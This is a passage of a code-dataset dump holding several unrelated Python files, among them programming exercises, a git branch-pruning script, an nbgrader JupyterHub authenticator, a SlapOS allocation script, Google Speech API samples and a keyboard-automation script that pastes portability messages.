HttpResponseRedirect(\"/\")\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160633109","text":"\"\"\"\n2019\n\nChapter 7 Exercises\n\nLoops\n\n\"\"\"\n\n#Q1 print a list\nli = [\"The Walking Dead\",\n \"Entourage\",\n \"The Sopranos\",\n \"The Vampire Diaries\"]\n\nfor show in li:\n print(show)\n\n#Q2 Print all numbers between 25-50\nx = 25\nwhile x <= 50:\n print(x)\n x += 1\n\n#Q3 Print items and indexes from Q1\nfor obj in li:\n print(li.index(obj), obj)\n\n#Q4 List guessing game \nnumbers = [11, 32, 33, 15, 1]\n\nwhile True:\n answer = input(\"Guess a number or type q to quit.\")\n if answer == \"q\":\n break\n try:\n answer = int(answer)\n except ValueError:\n print(\"please type a number or q to quit.\")\n if answer in numbers:\n print(\"You guessed correctly!\")\n else:\n print(\"You guessed incorrectly!\")\n \n\n#Q5 Multiply nested loops \nlist1 = [8, 19, 148, 4]\nlist2 = [9, 1, 33, 83]\nlist3 = []\n\nfor i in list1:\n for j in list2:\n mult = i * j\n list3.append(i * j)\n\nprint(list3)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Chapter7.py","file_name":"Chapter7.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"390224625","text":"#!/usr/bin/env python3\nimport argparse\nimport json\nimport os.path\nimport subprocess\n\nHERE = os.path.dirname(os.path.realpath(__file__))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dry-run', action='store_true')\n parser.add_argument('--remote', default='')\n parser.add_argument('--upstream', default='')\n args = parser.parse_args()\n\n cmd = (\n os.path.join(HERE, '_git-remote-upstream'),\n '--remote', args.remote, '--upstream', args.upstream,\n )\n remote, upstream = json.loads(subprocess.check_output(cmd))\n\n if args.dry_run:\n dry_run = 'echo '\n else:\n dry_run = ''\n\n subprocess.check_call((\n 'bash', '-c',\n f'git fetch --all --prune && '\n f'git branch --remote --merged {upstream}/master | '\n f'grep {remote}/ | '\n f\"cut -d'/' -f2-999 | \"\n f\"grep -Ev '^(PLACEHOLDER|master|stage|production)' | \"\n f\"grep -v '>' | \"\n f\"xargs --replace -P 8 {dry_run}git push {remote} :{{}}\",\n ))\n subprocess.check_call((\n 'bash', '-c',\n fr'git branch --merged {upstream}/master | '\n fr\"grep -Ev '(\\*|master)' | \"\n fr'xargs --no-run-if-empty {dry_run}git branch --delete',\n ))\n\n\nif __name__ == '__main__':\n exit(main())\n","sub_path":"python/prune-remote-branches.py","file_name":"prune-remote-branches.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"342039164","text":"import gym\nimport numpy as np\nfrom collections import deque\nfrom keras.models import load_model\nfrom atari_wrappers import wrap_deepmind\nimport time\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('env_name', type=str)\n parser.add_argument('model_name', type=str)\n parser.add_argument('--hist_len', type=int, default=4)\n parser.add_argument('--num_episodes', type=int, default=10)\n args = parser.parse_args()\n\n model = load_model(args.model_name)\n env = gym.make(args.env_name)\n env = wrap_deepmind(env)\n\n for i in range(args.num_episodes):\n obs = env.reset()\n obs_hist = deque([obs] * args.hist_len, maxlen=args.hist_len)\n done = False\n while not done:\n obs_input = np.concatenate(obs_hist, axis=2)\n action = model.predict(obs_input[np.newaxis])\n action = np.argmax(action[0])\n\n obs, reward, done, _ = env.step(action)\n env.render()\n obs_hist.append(obs)\n\n time.sleep(0.5)\n","sub_path":"hw3/play_atari.py","file_name":"play_atari.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"586524990","text":"\"\"\"JupyterHub authenticator.\"\"\"\nimport requests\nimport os\nimport json\nimport sys\n\nfrom subprocess import check_output\nfrom traitlets import Unicode, Int, List, Bool, Instance\nfrom six.moves.urllib.parse import unquote\nfrom tornado import web\n\ntry:\n from jupyterhub.services.auth import HubAuth as JupyterHubAuth\n JupyterHubAuth.__name__ = \"JupyterHubAuth\"\nexcept ImportError:\n JupyterHubAuth = None\n\nfrom .base import BaseAuth\n\n\nclass HubAuth(BaseAuth):\n \"\"\"Jupyter hub authenticator.\"\"\"\n\n graders = List([], config=True, help=\"List of JupyterHub user names allowed to grade.\")\n\n if JupyterHubAuth:\n hub_authenticator = Instance(JupyterHubAuth)\n else:\n hub_authenticator = None\n\n def _hub_authenticator_default(self):\n auth = JupyterHubAuth(parent=self)\n auth.login_url = '/hub/login'\n auth.api_url = '{}/hub/api'.format(self.hubapi_base_url)\n auth.api_token = self.hubapi_token\n auth.cookie_name = self.hubapi_cookie\n return auth\n\n hub_base_url = Unicode(config=True, help=\"Base URL of the hub server.\")\n def _hub_base_url_default(self):\n return 'http://{}:8000'.format(self._ip)\n\n hubapi_base_url = Unicode(config=True, help=\"Base URL of the hub server.\")\n def _hubapi_base_url_default(self):\n return 'http://{}:8081'.format(self._ip)\n def _hubapi_base_url_changed(self, name, old, new):\n if self.hub_authenticator:\n self.hub_authenticator.api_url = '{}/hub/api'.format(new)\n\n hubapi_token = Unicode(config=True, help=\"\"\"JupyterHub API auth token. \n Generated by running `jupyterhub token`. If not explicitly set,\n nbgrader will use $JPY_API_TOKEN as the API token.\"\"\")\n def _hubapi_token_default(self):\n return os.environ.get('JPY_API_TOKEN', '')\n def _hubapi_token_changed(self, name, old, new):\n if self.hub_authenticator:\n self.hub_authenticator.api_token = new\n\n hubapi_cookie = Unicode(\"jupyter-hub-token\", config=True, help=\"Name of the cookie used by JupyterHub\")\n def _hubapi_cookie_changed(self, name, old, new):\n if self.hub_authenticator:\n self.hub_authenticator.cookie_name = new\n\n proxy_base_url = Unicode(config=True, help=\"Base URL of the configurable-http-proxy server.\")\n def _proxy_base_url_default(self):\n return 'http://{}:8001'.format(self._ip)\n\n proxy_token = Unicode(config=True, help=\"\"\"JupyterHub configurable proxy \n auth token. If not explicitly set, nbgrader will use \n $CONFIGPROXY_AUTH_TOKEN as the API token.\"\"\")\n def _proxy_token_default(self):\n return os.environ.get('CONFIGPROXY_AUTH_TOKEN', '')\n\n notebook_url_prefix = Unicode(None, config=True, allow_none=True, help=\"\"\"\n Relative path of the formgrader with respect to the hub's user base\n directory. No trailing slash. i.e. \"Documents\" or \"Documents/notebooks\". \"\"\")\n def _notebook_url_prefix_changed(self, name, old, new):\n self.notebook_url_prefix = new.strip('/')\n\n remap_url = Unicode(config=True, help=\"\"\"Suffix appened to \n `HubAuth.hub_base_url` to form the full URL to the formgrade server. By\n default this is '/hub/{NbGrader.course_id}'. Change this if you\n plan on running more than one formgrade server behind one JupyterHub\n instance.\"\"\")\n def _remap_url_default(self):\n return '/hub/nbgrader/' + self.parent.course_id\n def _remap_url_changed(self, name, old, new):\n self.remap_url = new.rstrip('/')\n\n connect_ip = Unicode('', config=True, help=\"\"\"The formgrader ip address that\n JupyterHub should actually connect to. Useful for when the formgrader is\n running behind a proxy or inside a container.\"\"\")\n\n notebook_server_user = Unicode('', config=True, help=\"\"\"The user that hosts\n the autograded notebooks. By default, this is just the user that is logged\n in, but if that user is an admin user and has the ability to access other\n users' servers, then this variable can be set, allowing them to access\n the notebook server with the autograded notebooks.\"\"\")\n\n def _config_changed(self, name, old, new):\n if 'proxy_address' in new.HubAuth:\n raise ValueError(\n \"HubAuth.proxy_address is no longer a valid configuration \"\n \"option, please use HubAuth.proxy_base_url instead.\"\n )\n\n if 'proxy_port' in new.HubAuth:\n raise ValueError(\n \"HubAuth.proxy_port is no longer a valid configuration \"\n \"option, please use HubAuth.proxy_base_url instead.\"\n )\n\n if 'hub_address' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hub_address is no longer a valid configuration \"\n \"option, please use HubAuth.hub_base_url instead.\"\n )\n\n if 'hub_port' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hub_port is no longer a valid configuration \"\n \"option, please use HubAuth.hub_base_url instead.\"\n )\n\n if 'hubapi_address' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hubapi_address is no longer a valid configuration \"\n \"option, please use HubAuth.hubapi_base_url instead.\"\n )\n\n if 'hubapi_port' in new.HubAuth:\n raise ValueError(\n \"HubAuth.hubapi_port is no longer a valid configuration \"\n \"option, please use HubAuth.hubapi_base_url instead.\"\n )\n\n super(HubAuth, self)._config_changed(name, old, new)\n\n def __init__(self, *args, **kwargs):\n super(HubAuth, self).__init__(*args, **kwargs)\n self._base_url = self.hub_base_url + self.remap_url\n self.register_with_proxy()\n\n @property\n def login_url(self):\n return self.hub_authenticator.login_url\n\n def register_with_proxy(self):\n # Register self as a route of the configurable-http-proxy and then\n # update the base_url to point to the new path.\n if self.connect_ip:\n ip = self.connect_ip\n else:\n ip = self._ip\n target = 'http://{}:{}'.format(ip, self._port)\n self.log.info(\"Proxying {} --> {}\".format(self.remap_url, target))\n response = self._proxy_request('/api/routes' + self.remap_url, method='POST', body={\n 'target': target\n })\n # This error will occur, for example, if the CONFIGPROXY_AUTH_TOKEN is\n # incorrect.\n if response.status_code != 201:\n raise Exception('Error while trying to add JupyterHub route. {}: {}'.format(response.status_code, response.text))\n\n def add_remap_url_prefix(self, url):\n if url == '/':\n return self.remap_url + '/?'\n else:\n return self.remap_url + url\n\n def transform_handler(self, handler):\n new_handler = list(handler)\n\n # transform the handler url\n url = self.add_remap_url_prefix(handler[0])\n new_handler[0] = url\n\n # transform any urls in the arguments\n if len(handler) > 2:\n new_args = handler[2].copy()\n if 'url' in new_args:\n new_args['url'] = self.add_remap_url_prefix(new_args['url'])\n new_handler[2] = new_args\n\n return tuple(new_handler)\n\n def get_user(self, handler):\n user_model = self.hub_authenticator.get_user(handler)\n if user_model:\n return user_model['name']\n return None\n\n def authenticate(self, user):\n \"\"\"Authenticate a request.\n Returns a boolean or redirect.\"\"\"\n\n # Check if the user name is registered as a grader.\n if user in self.graders:\n self._user = user\n return True\n\n self.log.warn('Unauthorized user \"%s\" attempted to access the formgrader.' % user)\n return False\n\n def notebook_server_exists(self):\n \"\"\"Does the notebook server exist?\"\"\"\n if self.notebook_server_user:\n user = self.notebook_server_user\n else:\n user = self._user\n\n # first check if the server is running\n response = self._hubapi_request('/hub/api/users/{}'.format(user))\n if response.status_code == 200:\n user_data = response.json()\n else:\n self.log.warn(\"Could not access information about user {} (response: {} {})\".format(\n user, response.status_code, response.reason))\n return False\n\n # start it if it's not running\n if user_data['server'] is None and user_data['pending'] != 'spawn':\n # start the server\n response = self._hubapi_request('/hub/api/users/{}/server'.format(user), method='POST')\n if response.status_code not in (201, 202):\n self.log.warn(\"Could not start server for user {} (response: {} {})\".format(\n user, response.status_code, response.reason))\n return False\n\n return True\n\n def get_notebook_server_cookie(self):\n # same user, so no need to request admin access\n if not self.notebook_server_user:\n return None\n\n # request admin access to the user's server\n response = self._hubapi_request('/hub/api/users/{}/admin-access'.format(self.notebook_server_user), method='POST')\n if response.status_code != 200:\n self.log.warn(\"Failed to gain admin access to user {}'s server (response: {} {})\".format(\n self.notebook_server_user, response.status_code, response.reason))\n return None\n\n # access granted!\n cookie_name = '{}-{}'.format(self.hubapi_cookie, self.notebook_server_user)\n notebook_server_cookie = unquote(response.cookies[cookie_name][1:-1])\n cookie = {\n 'name': cookie_name,\n 'value': notebook_server_cookie,\n 'path': '/user/{}'.format(self.notebook_server_user)\n }\n\n return cookie\n\n def get_notebook_url(self, relative_path):\n \"\"\"Gets the notebook's url.\"\"\"\n if self.notebook_url_prefix is not None:\n relative_path = self.notebook_url_prefix + '/' + relative_path\n if self.notebook_server_user:\n user = self.notebook_server_user\n else:\n user = self._user\n return \"{}/user/{}/notebooks/{}\".format(self.hub_base_url, user, relative_path)\n\n def _hubapi_request(self, *args, **kwargs):\n return self._request('hubapi', *args, **kwargs)\n\n def _proxy_request(self, *args, **kwargs):\n return self._request('proxy', *args, **kwargs)\n\n def _request(self, service, relative_path, method='GET', body=None):\n base_url = getattr(self, '%s_base_url' % service)\n token = getattr(self, '%s_token' % service)\n\n data = body\n if isinstance(data, (dict,)):\n data = json.dumps(data)\n\n return requests.request(method, base_url + relative_path, headers={\n 'Authorization': 'token %s' % token\n }, data=data)\n","sub_path":"nbgrader/auth/hubauth.py","file_name":"hubauth.py","file_ext":"py","file_size_in_byte":11061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"515068504","text":"import random\nfrom Products.ZSQLCatalog.SQLCatalog import SimpleQuery, ComplexQuery\nperson = context\n\ncomputer_partition = None\nquery_kw = {\n 'software_release_url': software_release_url,\n 'portal_type': 'Computer Partition',\n}\nif software_instance_portal_type == \"Slave Instance\":\n query_kw['free_for_request'] = 0\n query_kw['software_type'] = software_type\nelif software_instance_portal_type == \"Software Instance\":\n query_kw['free_for_request'] = 1\nelse:\n raise NotImplementedError(\"Unknown portal type %s\"%\n software_instance_portal_type)\n\n# support SLA\n\n# Explicit location\nexplicit_location = False\nif \"computer_guid\" in filter_kw:\n explicit_location = True\n query_kw[\"parent_reference\"] = SimpleQuery(parent_reference=filter_kw.pop(\"computer_guid\"))\n\nif \"instance_guid\" in filter_kw:\n explicit_location = True\n portal = context.getPortalObject()\n instance_guid = filter_kw.pop(\"instance_guid\")\n query_kw[\"aggregate_related_reference\"] = SimpleQuery(aggregate_related_reference=instance_guid)\n\nif 'network_guid' in filter_kw:\n network_guid = filter_kw.pop('network_guid')\n query_kw[\"default_subordination_reference\"] = SimpleQuery(default_subordination_reference=network_guid)\n\nif computer_network_query:\n if query_kw.get(\"default_subordination_reference\"):\n query_kw[\"default_subordination_reference\"] = ComplexQuery(\n query_kw[\"default_subordination_reference\"],\n computer_network_query\n )\n else:\n query_kw[\"default_subordination_reference\"] = computer_network_query\n\nif \"retention_delay\" in filter_kw:\n filter_kw.pop(\"retention_delay\")\n\ncomputer_base_category_list = [\n 'group',\n 'cpu_core',\n 'cpu_frequency',\n 'cpu_type',\n 'local_area_network_type',\n 'region',\n 'memory_size',\n 'memory_type',\n 'storage_capacity',\n 'storage_interface',\n 'storage_redundancy',\n]\nfor base_category in computer_base_category_list:\n if base_category in filter_kw:\n category_relative_url = \"%s\" % filter_kw.pop(base_category)\n # XXX Small protection to prevent entering strange strings\n category = context.getPortalObject().portal_categories[base_category].restrictedTraverse(str(category_relative_url), None)\n if category is None:\n query_kw[\"uid\"] = \"-1\"\n else:\n query_kw[\"%s_uid\" % base_category] = category.getUid()\n\nquery_kw[\"capacity_scope_uid\"] = context.getPortalObject().portal_categories.capacity_scope.open.getUid()\n# if not explicit_location:\n# # Only allocation on public computer\n# query_kw[\"allocation_scope_uid\"] = context.getPortalObject().portal_categories.allocation_scope.open.public.getUid()\n\nif filter_kw.keys():\n # XXX Drop all unexpected keys\n query_kw[\"uid\"] = \"-1\"\n\nif test_mode:\n return bool(len(context.portal_catalog(limit=1, **query_kw)))\n\n# Get only one computer_partition per computer\ncomputer_partition_list = context.portal_catalog(group_by=\"parent_uid\", **query_kw)\n\nsoftware_release_list = context.portal_catalog(\n portal_type=\"Software Release\",\n url_string=software_release_url\n) \n\nif len(software_release_list) == 0:\n # Forbid to allocate partitions without an existing Software Release Document.\n raise KeyError(len(software_release_list))\n\ndelta_co2_contribution_list = software_release_list[0].SoftwareRelease_getDeltaCO2List(computer_partition_list)\n\nisTransitionPossible = context.getPortalObject().portal_workflow.isTransitionPossible\n\nwhile len(delta_co2_contribution_list):\n partition_candidate_list = delta_co2_contribution_list.pop(min(delta_co2_contribution_list))\n\n for computer_partition_candidate in partition_candidate_list:\n computer_partition_candidate = computer_partition_candidate.getObject()\n if software_instance_portal_type == \"Software Instance\":\n # Check if the computer partition can be marked as busy\n if isTransitionPossible(computer_partition_candidate, 'mark_busy'):\n computer_partition = computer_partition_candidate\n computer_partition.markBusy()\n break\n elif computer_partition_candidate.getSlapState() == \"busy\":\n # Only assign slave instance on busy partition\n computer_partition = computer_partition_candidate\n break\n\nif computer_partition is None:\n raise ValueError('It was not possible to find free Computer Partition')\n\n# lock computer partition\ncomputer_partition.serialize()\n\nreturn computer_partition.getRelativeUrl()\n","sub_path":"master/bt5/slapos_ecoallocation/SkinTemplateItem/portal_skins/slapos_ecoallocation/Person_findPartitionEcoAllocation.py","file_name":"Person_findPartitionEcoAllocation.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"14518706","text":"#!/usr/bin/env python\n\n# Copyright 2018 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Google Cloud Speech API sample that demonstrates enhanced models\nand recognition metadata.\nExample usage:\n python beta_snippets.py enhanced-model\n python beta_snippets.py metadata\n python beta_snippets.py punctuation\n python beta_snippets.py diarization\n python beta_snippets.py multi-channel\n python beta_snippets.py multi-language\n python beta_snippets.py word-level-conf\n\"\"\"\n\nimport argparse\nimport io\nfrom google.cloud import speech_v1p1beta1 as speech\n\ndef transcribe_gcs_with_metadata_return(gcs_uri, #스토리지 uri\n sample_rate_hertzs, #샘플비율 헤르츠\n interactionTypes, #오디오 사용 사례\n industryNaicsCodeOfAudios, #오디오 산업 카테고리\n microphoneDistances, #스피커에서 마이크 까지의 거리\n originalMediaTypes, #오디오의 원본 오디오 또는 비디오 중 하나\n recordingDeviceTypes): #오디오 캡쳐 장치 종류\n \"\"\"Send a request that includes recognition metadata.\"\"\"\n # [START speech_transcribe_recognition_metadata_beta]\n\n print('gcs_uri : ', gcs_uri)\n client = speech.SpeechClient()\n audio = speech.types.RecognitionAudio(uri=gcs_uri)\n\n # Here we construct a recognition metadata object.\n # Most metadata fields are specified as enums that can be found\n # in speech.enums.RecognitionMetadata\n metadata = speech.types.RecognitionMetadata()\n metadata.interaction_type = interactionTypes\n # And some are integers, for instance the 6 digit NAICS code\n # https://www.naics.com/search/\n metadata.industry_naics_code_of_audio = industryNaicsCodeOfAudios #default : 519190\n metadata.recording_device_type = recordingDeviceTypes\n metadata.microphone_distance = microphoneDistances\n #append meta start\n #append meta end\n # Some metadata fields are free form strings\n metadata.recording_device_name = \"Pixel 2 XL\"\n\n\n config = speech.types.RecognitionConfig(\n encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,\n sample_rate_hertz=sample_rate_hertzs,\n language_code='ko-KR',\n # Add this in the request to send metadata.\n metadata=metadata)\n\n operation = client.long_running_recognize(config, audio)\n\n print('Waiting for operation to complete...')\n response = operation.result(timeout=90)\n\n tuple_result_msg = ()\n result_msg = ''\n confidence = 0\n for i, result in enumerate(response.results):\n alternative = result.alternatives[0]\n print('-' * 20)\n print('First alternative of result {}'.format(i))\n print('Transcript: {}'.format(alternative.transcript))\n print('confidence: {}'.format(alternative.confidence))\n result_msg += result.alternatives[0].transcript + ' '\n confidence += result.alternatives[0].confidence\n\n # 결과를 빅쿼리에 저장하기 위해 return\n tuple_result_msg = (result_msg, confidence / len(response.results))\n return tuple_result_msg\n # [END speech_transcribe_recognition_metadata_beta]\n\n\ndef transcribe_gcs_with_metadata(gcs_uri):\n \"\"\"Send a request that includes recognition metadata.\"\"\"\n # [START speech_transcribe_recognition_metadata_beta]\n\n print('gcs_uri : ', gcs_uri)\n client = speech.SpeechClient()\n audio = speech.types.RecognitionAudio(uri=gcs_uri)\n\n # Here we construct a recognition metadata object.\n # Most metadata fields are specified as enums that can be found\n # in speech.enums.RecognitionMetadata\n metadata = speech.types.RecognitionMetadata()\n metadata.interaction_type = (\n speech.enums.RecognitionMetadata.InteractionType.DISCUSSION)\n metadata.microphone_distance = (\n speech.enums.RecognitionMetadata.MicrophoneDistance.NEARFIELD)\n metadata.recording_device_type = (\n speech.enums.RecognitionMetadata.RecordingDeviceType.SMARTPHONE)\n # Some metadata fields are free form strings\n metadata.recording_device_name = \"Pixel 2 XL\"\n # And some are integers, for instance the 6 digit NAICS code\n # https://www.naics.com/search/\n metadata.industry_naics_code_of_audio = 519190\n\n config = speech.types.RecognitionConfig(\n encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,\n sample_rate_hertz=8000,\n language_code='ko-KR',\n # Add this in the request to send metadata.\n metadata=metadata)\n\n operation = client.long_running_recognize(config, audio)\n\n print('Waiting for operation to complete...')\n response = operation.result(timeout=90)\n\n for i, result in enumerate(response.results):\n alternative = result.alternatives[0]\n print('-' * 20)\n print('First alternative of result {}'.format(i))\n print('Transcript: {}'.format(alternative.transcript))\n print('confidence: {}'.format(alternative.confidence))\n # [END speech_transcribe_recognition_metadata_beta]\n\ndef transcribe_file_with_metadata():\n \"\"\"Send a request that includes recognition metadata.\"\"\"\n # [START speech_transcribe_recognition_metadata_beta]\n client = speech.SpeechClient()\n\n speech_file = 'C:/Users/웰컴저축은행/workspace/google_stt_poc/resources/샘플_4_개인정보삭제.wav'\n\n with io.open(speech_file, 'rb') as audio_file:\n content = audio_file.read()\n\n # Here we construct a recognition metadata object.\n # Most metadata fields are specified as enums that can be found\n # in speech.enums.RecognitionMetadata\n metadata = speech.types.RecognitionMetadata()\n metadata.interaction_type = (\n speech.enums.RecognitionMetadata.InteractionType.DISCUSSION)\n metadata.microphone_distance = (\n speech.enums.RecognitionMetadata.MicrophoneDistance.NEARFIELD)\n metadata.recording_device_type = (\n speech.enums.RecognitionMetadata.RecordingDeviceType.SMARTPHONE)\n # Some metadata fields are free form strings\n metadata.recording_device_name = \"Pixel 2 XL\"\n # And some are integers, for instance the 6 digit NAICS code\n # https://www.naics.com/search/\n metadata.industry_naics_code_of_audio = 519190\n\n audio = speech.types.RecognitionAudio(content=content)\n config = speech.types.RecognitionConfig(\n encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,\n sample_rate_hertz=8000,\n language_code='ko-KR',\n # Add this in the request to send metadata.\n metadata=metadata)\n\n response = client.recognize(config, audio)\n\n for i, result in enumerate(response.results):\n print('result : ', result)\n alternative = result.alternatives[0]\n print('-' * 20)\n print('alternative : ', alternative)\n print('First alternative of result {}'.format(i))\n print('Transcript: {}'.format(alternative.transcript))\n print('confidence: {}'.format(alternative.confidence))\n # [END speech_transcribe_recognition_metadata_beta]\n\nif __name__ == '__main__':\n #transcribe_file_with_metadata()\n #transcribe_gcs_with_metadata('gs://dlab_ml/speech/ref/샘플_1_개인정보삭제.wav')\n transcribe_gcs_with_metadata_return('gs://dlab_ml/speech/ref/샘플_1_개인정보삭제.wav', # 스토리지 uri\n 8000, # 샘플비율 헤르츠\n speech.enums.RecognitionMetadata.InteractionType.DISCUSSION, # 오디오 사용 사례\n 522291, # 오디오 산업 카테고리\n speech.enums.RecognitionMetadata.MicrophoneDistance.NEARFIELD, # 스피커에서 마이크 까지의 거리\n speech.enums.RecognitionMetadata.OriginalMediaType.AUDIO, # 오디오의 원본 오디오 또는 비디오 중 하나\n speech.enums.RecognitionMetadata.RecordingDeviceType.SMARTPHONE) # 오디오 캡쳐 장치 종류","sub_path":"cloud_client/beta_snippets.py","file_name":"beta_snippets.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293903705","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 14 11:59:36 2020\r\n\r\n@author: Tushar Saxena\r\n\"\"\"\r\n\r\nimport array as arr\r\na = arr.array('i', [1, 2, 3, 4, 5])\r\nwhile True:\r\n print('1: Print Array')\r\n print('2: Add Element')\r\n print('3: Delete Element')\r\n print('4: Exit')\r\n \r\n choice = int(input(\"Enter your choice.\"))\r\n \r\n if choice == 1:\r\n for n in a:\r\n print(n)\r\n elif choice == 2:\r\n val = int(input(\"Enter the value to be added!\"))\r\n if isinstance(val, int):\r\n a.append(val)\r\n elif choice == 3:\r\n val = a.pop()\r\n print(\"Value popped: \", val)\r\n elif choice == 4:\r\n break\r\n else:\r\n print(\"Enter valid choice!\")","sub_path":"array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"447154107","text":"import sys\ntext = sys.stdin.readlines()\n# print(text)\ntextline = (''.join(text))\ntextlist = list(textline.split('\\n'))\nN = int(text[0])\nA = set()\nfor i in range(1, N+1):\n A.add(i)\nB = list()\nfor line in textlist[1:]:\n s = line.split()\n if s[0] == 'HELP':\n break\n tmp = set()\n for item in s:\n tmp.add(int(item))\n if len(A & tmp) * 2 > len(A):\n print('YES')\n A &= tmp\n else:\n print('NO')\n A -= tmp\n # B.append(temp)\n# print(*B)\n# for item in B:\n# if len(A & item) * 2 > len(A):\n# print('YES')\n# A &= item\n# else:\n# print('NO')\n# A -= item\n # print(*sorted(A))\nprint(*sorted(A))\n","sub_path":"Week7/w7.8.py","file_name":"w7.8.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"317291499","text":"# %load q02_plot_matches_by_team/build.py\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_matches_by_team():\n #create empty canvas to draw \n fig = plt.figure()\n # groupby batting team then count unique and select match_code(as it uniquely identified matched played)\n match_played = ipl_df.groupby('batting_team').nunique()['match_code']\n #plotting bar\n plt.bar(match_played.index, match_played)\n #rotating x ticks by -90 for easy reading team name\n plt.xticks(rotation = -90)\n plt.show()\n \nplot_matches_by_team()\n\n\n\n","sub_path":"q02_plot_matches_by_team/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"558501972","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''Envía mensajes de portas'''\n__license__ = \"GPL\"\n__version__ = \"1.0.0\"\n__email__ = \"sirmcoil73@gmail.com\"\n__author__ = \"Mario Rodríguez\"\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nimport time\nimport pyperclip as clipboard\nfrom pynput import mouse, keyboard\nfrom pynput.mouse import Button, Controller\nmouse = Controller()\nfrom pynput.keyboard import Key, Controller as Ctrlr2\nkeybrd = Ctrlr2()\nimport mysql.connector as mariadb\n\n\n\ndef on_press(key):\n try:\n print(key.char)\n\n except AttributeError:\n #print('special key {0} pressed'.format(key) )\n if (key==Key.cmd):\n pegarmsg()\n \ndef pegarmsg():\n total=0\n conn = mariadb.connect(host='localhost', port='3306', user='*****', password='*****', database='portas')\n cursor = conn.cursor()\n cursor2 = conn.cursor(prepared=True)\n try:\n cursor.execute(\"SELECT ID, TELEFONO, NOMBRE, APEP, APEM, IDCOP, ICCID FROM `t_portas` WHERE MENSAJE=0 ORDER BY ID LIMIT 10\")\n records=cursor.fetchall()\n for ID, TELEFONO, NOMBRE, APEP, APEM, IDCOP, ICCID in records:\n total+=1\n msgid=str(ID)\n msg='NOMBRE DEL PROMOTOR: HERNANDEZ CUEVAS VERONICA ALEJANDRA\\n'\n msg+='SUPERVISOR: VACANTE\\n'\n msg+='NUMERO A PORTAR: '+ str(TELEFONO)+'\\n'\n msg+='CLIENTE: '+str(NOMBRE)+' '+str(APEP)+' '+str(APEM)+'\\n'\n msg+='NUMERO SECUENCIAL: '+ str(IDCOP)+'\\n'\n msg+='SIM: '+ str(ICCID)+'\\n'\n msg+='COMPAÑÍA: MOVISTAR\\n'\n msg+='PROMOCIÓN: 50\\n'\n msg+='EQUIPO: NAUCALPAN\\n'\n msg+='COLOR: VERDE';\n clipboard.copy(msg)\n time.sleep(0.3)\n with keybrd.pressed(Key.ctrl):\n keybrd.press('v')\n keybrd.release('v')\n time.sleep(0.3)\n keybrd.press(Key.enter)\n keybrd.release(Key.enter)\n try:\n cursor2.execute(\"UPDATE `t_portas` SET MENSAJE=1 WHERE ID='\"+msgid+\"'\")\n conn.commit()\n #print(str(ID)+\"- \",cursor2.rowcount, \"fila afectada\")\n except mariadb.Error as error:\n print(str(ID)+\"-Error1: {}\".format(error))\n print(total)\n\n \n except mariadb.Error as error:\n print(\"Error2: {}\".format(error))\n\n finally:\n if(conn.is_connected() ):\n conn.close()\n print('TERMINADO')\n \n\n# Collect events until released\nwith keyboard.Listener(on_press=on_press) as listener:\n listener.join()\n","sub_path":"armado-mensajes.py","file_name":"armado-mensajes.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"159422334","text":"'''\n*****************************************************************************************\n*\n* ===============================================\n* Nirikshak Bot (NB) Theme (eYRC 2020-21)\n* ===============================================\n*\n* This script is to implement Task 1B of Nirikshak Bot (NB) Theme (eYRC 2020-21).\n*\n* This software is made available on an \"AS IS WHERE IS BASIS\".\n* Licensee/end user indemnifies and will keep e-Yantra indemnified from\n* any and all claim(s) that emanate from the use of the Software or\n* breach of the terms of this agreement.\n*\n* e-Yantra - An MHRD project under National Mission on Education using ICT 